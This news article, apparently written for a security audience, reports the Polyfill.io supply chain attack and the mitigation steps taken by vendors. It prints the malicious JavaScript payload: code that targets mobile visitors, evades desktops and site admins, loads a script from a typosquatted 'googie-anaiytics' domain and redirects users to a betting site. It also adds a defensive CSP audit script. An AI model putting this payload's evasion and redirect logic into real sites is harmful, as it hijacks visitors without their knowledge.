Polyfill supply chain attack affects 100K+ sites

By AI Bot

In a significant cybersecurity incident, the Polyfill supply chain attack has compromised over 100,000 websites. This breach affects notable users, including JSTOR, Intuit, and the World Economic Forum, highlighting the pervasive reach and potential dangers of the attack.

The Incident

Polyfill.js is a widely used open-source library that supplies modern JavaScript features to older browsers; sites typically load it from the cdn.polyfill.io domain. However, a Chinese company acquired both the domain and the corresponding GitHub account in February 2023. Since then, malicious actors have exploited this access to inject malware into mobile devices through any site that loads scripts from cdn.polyfill.io.

The ongoing attack has prompted a series of responses from major tech players and cybersecurity firms:

  • Google: As of June 25th, Google has started blocking Google Ads for eCommerce sites that use cdn.polyfill.io.
  • Cloudflare: On June 27th, Cloudflare implemented real-time rewrites of cdn.polyfill.io to more secure versions.
  • Namecheap: Shortly after Cloudflare's intervention, Namecheap put the domain on hold, reducing the immediate risk.

Despite these measures, the original authors of Polyfill recommend that users avoid Polyfill altogether, as modern browsers no longer require it. For those who still need it, alternatives provided by Fastly and Cloudflare have emerged.

Technical Aspects of the Attack

The malicious code served via Polyfill is generated dynamically based on the request's HTTP headers, which increases both the complexity and the reach of the attack. According to analysis from SanSec:

  • The malware targets specific mobile devices and activates only under certain conditions, such as specific hours and the absence of administrative users.
  • It redirects users to a fraudulent sports betting site through a fake Google Analytics domain (www.googie-anaiytics.com).
  • The code is engineered to avoid detection by delaying its execution when it encounters web analytics services.

Example of Malicious Payload

// Payload as reported; loadJS and usercache are referenced but not defined in this excerpt.

// Desktop check: true on Windows and macOS platforms. The redirect below only
// fires when this returns false, so desktop visitors never see it.
function isPc() {
  try {
    var isWin = navigator.platform == "Win32" || navigator.platform == "Windows",
        isMac = navigator.platform == "Mac68K" || navigator.platform == "MacPPC" ||
        navigator.platform == "Macintosh" || navigator.platform == "MacIntel";

    if (isMac || isWin) {
      return true;
    } else {
      return false;
    }
  } catch (exception) {
    return false;
  }
}

// Second stage: loads a script from the look-alike "googie-anaiytics.com" host
// and only redirects once that script has set usercache.
function vfed_update(url) {
  url !== "" && loadJS("https://www.googie-anaiytics.com/html/checkcachehw.js", function () {
    if (usercache == true) {
      window.location.href = url;
    }
  });
}

// Gate: mobile user agent required; then host, referrer, time of day and a
// random draw decide whether to redirect. Suppressed on desktops and when
// admin-looking cookies are present. Re-runs itself every 2 seconds.
function check_tiaozhuan() {
  var isMobile = navigator.userAgent.match(/(phone|pad|pod|iPhone|iPod|ios|iPad|Android|Mobile|BlackBerry|IEMobile|MQQBrowser|JUC|Fennec|wOSBrowser|BrowserNG|WebOS|Symbian|Windows Phone)/i);

  if (isMobile) {
    var curHost = window.location.host,
        ref = document.referrer,
        redirectURL = "",
        kuurzaBitGet = "https://kuurza.com/redirect?from=bitget",
        rnd = Math.floor(Math.random() * 100 + 1),
        date = new Date(),
        hours = date.getHours();

    if (curHost.indexOf("www.dxtv1.com") !== -1 || curHost.indexOf("www.ys752.com") !== -1) {
      redirectURL = "https://kuurza.com/redirect?from=bitget";
    } else if (curHost.indexOf("shuanshu.com.com") !== -1) {
      redirectURL = "https://kuurza.com/redirect?from=bitget";
    } else if (ref.indexOf(".") !== -1 && ref.indexOf(curHost) == -1) {
      // External referrer: visitor arrived from another site
      redirectURL = "https://kuurza.com/redirect?from=bitget";
    } else if (hours >= 0 && hours < 2 && rnd <= 10) {
      redirectURL = kuurzaBitGet;
    } else if (hours >= 2 && hours < 4 && rnd <= 15) {
      redirectURL = kuurzaBitGet;
    } else if (hours >= 4 && hours < 7 && rnd <= 20) {
      redirectURL = kuurzaBitGet;
    } else if (hours >= 7 && hours < 8 && rnd <= 10) {
      redirectURL = kuurzaBitGet;
    } else if (rnd <= 10) {
      redirectURL = kuurzaBitGet;
    }

    if (redirectURL !== "" && !isPc() && !document.cookie.includes("admin_id") && !document.cookie.includes("adminlevels")) {
      vfed_update(redirectURL);
    }
  }
  setTimeout(check_tiaozhuan, 2000);
}
check_tiaozhuan();

Recommendations

As the risks associated with using cdn.polyfill.io remain high, experts recommend removing any Polyfill references from your code. Those who still need polyfills can use the alternative services provided by Fastly and Cloudflare, which are confirmed to be trustworthy for this purpose. Additionally, a Content Security Policy (CSP) monitoring service, such as the free Sansec Watch, gives visibility into the code your users are actually loading.

Furthermore, updating backend scanners, like Sansec's eComscan, to detect Polyfill-related vulnerabilities can provide an added layer of security.
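The two recommendations above (find and remove Polyfill references; use CSP monitoring for visibility) can be checked together with a small audit script. The following is an added example, not code from this article, from Sansec, or from the Polyfill project: a Node.js helper that lists the external scripts a page loads, flags any served from polyfill.io, and evaluates each script host against the page's script-src allowlist. The sample HTML, CSP and page origin are constructed for the example, and the CSP matcher is a deliberate simplification (host sources only; nonces, hashes and path matching are ignored).

```javascript
// Added example (not from the article, Sansec, or the Polyfill project):
// audit a page's external <script> sources against a suspect-host list and a
// Content-Security-Policy script-src allowlist.
// The HTML, CSP and origin below are constructed sample data.

const SUSPECT_HOSTS = ["polyfill.io"]; // matches the apex and any subdomain such as cdn.polyfill.io

const PAGE_ORIGIN = "https://shop.example";
const SAMPLE_HTML = `
<!doctype html><html><head>
<script src="/js/app.js"></script>
<script src="https://cdn.polyfill.io/v3/polyfill.min.js?features=default"></script>
<script src="//cdn.polyfill.io/v2/polyfill.min.js"></script>
<script>/* inline code has no external source and is skipped */</script>
</head><body></body></html>`;
const SAMPLE_CSP =
  "default-src 'self'; script-src 'self' https://cdn.polyfill.io; report-uri https://csp.example/report";

// Collect the src attribute of every <script src=...> tag.
function extractScriptSources(html) {
  const re = /<script\b[^>]*?\bsrc\s*=\s*["']([^"']+)["']/gi;
  const out = [];
  let m;
  while ((m = re.exec(html)) !== null) out.push(m[1]);
  return out;
}

// Resolve a relative or protocol-relative src against the page origin.
function hostOf(src, pageOrigin) {
  try { return new URL(src, pageOrigin).hostname.toLowerCase(); } catch { return null; }
}

function isSuspectHost(host) {
  return SUSPECT_HOSTS.some(s => host === s || host.endsWith("." + s));
}

// Source expressions of script-src, falling back to default-src.
function scriptSrcOf(csp) {
  const directives = {};
  for (const part of csp.split(";")) {
    const [name, ...values] = part.trim().split(/\s+/);
    if (name) directives[name.toLowerCase()] = values;
  }
  return directives["script-src"] || directives["default-src"] || [];
}

// Simplified host-source matching: 'self', '*', exact hosts (optional scheme,
// port, path) and leading wildcards (*.example.com). Keyword, nonce and hash
// sources never match a host.
function cspAllowsHost(sources, host, pageHost) {
  return sources.some(src => {
    if (src === "'self'") return host === pageHost;
    if (src === "*") return true;
    if (src.startsWith("'")) return false;
    const pattern = src
      .replace(/^[a-z][a-z0-9+.-]*:\/\//i, "") // strip scheme
      .replace(/\/.*$/, "")                    // strip path
      .replace(/:\d+$/, "")                    // strip port
      .toLowerCase();
    if (pattern.startsWith("*.")) return host.endsWith(pattern.slice(1));
    return host === pattern;
  });
}

// One finding per external script: resolved host, whether it is on the suspect
// list, and whether the CSP would let it load at all.
function auditPage(html, csp, pageOrigin) {
  const pageHost = new URL(pageOrigin).hostname.toLowerCase();
  const sources = scriptSrcOf(csp);
  return extractScriptSources(html).map(src => {
    const host = hostOf(src, pageOrigin);
    return {
      src,
      host,
      suspect: host !== null && isSuspectHost(host),
      allowedByCsp: host !== null && cspAllowsHost(sources, host, pageHost),
    };
  });
}

function demo() {
  for (const f of auditPage(SAMPLE_HTML, SAMPLE_CSP, PAGE_ORIGIN)) {
    console.log(`${f.suspect ? "SUSPECT" : "ok     "} csp=${f.allowedByCsp ? "allow" : "block"} ${f.src}`);
  }
  // The second-stage host named in the article is not in script-src, so this
  // CSP blocks it and the report-uri endpoint records the violation.
  const secondStage = "www.googie-anaiytics.com";
  const allowed = cspAllowsHost(scriptSrcOf(SAMPLE_CSP), secondStage, "shop.example");
  console.log(`second stage ${secondStage}: csp=${allowed ? "allow" : "block"}`);
}
demo();
```

Two points the run makes visible. First, a CSP that allow-lists cdn.polyfill.io still admits the loader itself, so the policy only helps with the second stage; removing the reference is the actual fix. Second, Subresource Integrity is no substitute here: the article notes the payload is generated per request from HTTP headers, so there is no stable hash to pin, which is why visibility through CSP reporting (the monitoring the article recommends) matters more than integrity attributes for scripts like this.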

Official Statements

The original Polyfill author has advised against using the service, stating, "it is no longer needed by modern browsers."

SanSec has been at the forefront, providing updates and technical insights, reinforcing the urgency to replace or remove Polyfill from affected websites.

For more information, visit the detailed analysis by SanSec here.
